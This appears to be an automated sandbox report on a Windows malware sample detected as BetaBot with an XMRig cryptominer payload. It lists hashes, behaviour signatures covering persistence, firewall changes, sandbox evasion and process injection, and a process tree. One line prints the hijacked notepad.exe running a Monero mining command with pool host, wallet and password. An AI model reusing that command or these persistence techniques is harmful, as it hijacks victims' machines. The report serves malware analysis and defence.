Analysis

  • max time kernel
    154s
  • max time network
    184s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    07-07-2022 23:58

General

  • Target

    43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe

  • Size

    2.1MB

  • MD5

    65c47159ad930504229825ef323aecf8

  • SHA1

    26974a01d0815a6f5cc63b34527a1a6a91ba2705

  • SHA256

    43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16

  • SHA512

    d2ccc975b97380f2c3d4fdc0d403f0b150b4e34eedc6b1e3f4d4d1ff773a6bb0d7dcb48cccfd83e8ac06ec2972006da9bc21481cadf02563dcc17cbe89888d77

Malware Config

Signatures

  • BetaBot

    Beta Bot is a Trojan that infects computers and disables antivirus software.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Modifies firewall policy service 2 TTPs 4 IoCs
  • suricata: ET MALWARE Win32/Neurevt.A/Betabot Check-in 4

  • xmrig

    XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.

  • XMRig Miner payload 3 IoCs
  • Sets file execution options in registry 2 TTPs 4 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies Internet Explorer Protected Mode 1 TTPs 4 IoCs
  • Modifies Internet Explorer Protected Mode Banner 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1280
      • C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
        "C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
        2⤵
        • Drops startup file
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1928
        • C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
          "C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
          3⤵
          • Sets file execution options in registry
          • Checks whether UAC is enabled
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Checks processor information in registry
          • Suspicious behavior: MapViewOfSection
          • Suspicious behavior: RenamesItself
          • Suspicious use of AdjustPrivilegeToken
          PID:1484
          • C:\Windows\SysWOW64\explorer.exe
            C:\Windows\SysWOW64\explorer.exe
            4⤵
            • Modifies firewall policy service
            • Sets file execution options in registry
            • Checks BIOS information in registry
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Checks processor information in registry
            • Enumerates system info in registry
            • Modifies Internet Explorer Protected Mode
            • Modifies Internet Explorer Protected Mode Banner
            • Modifies Internet Explorer settings
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:568
        • C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
          "C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
          3⤵
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          PID:940
          • C:\Windows\notepad.exe
            "C:\Windows\notepad.exe" -o pool.monero.hashvault.pro:5555:80 -u 48g2oLrkRG5JtnYA1pUukrYHgsu6aBqGTVxzZx6av6wvhBtgTHrKquWXMY2BJNnxs3aqj3U5RMnoZ6HaZYRMUouU8ke7kC4 -p trainwreck -v 0 -t 2
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1180
        • C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
          "C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1400
          • C:\Windows\SysWOW64\msiexec.exe
            C:\Windows\SysWOW64\msiexec.exe
            4⤵
            • Modifies WinLogon for persistence
            • Adds Run key to start application
            • Maps connected drives based on registry
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            PID:560
  • C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    1⤵
      PID:1248
  • C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    1⤵
      PID:1556

Network

MITRE ATT&CK Enterprise v6

Downloads
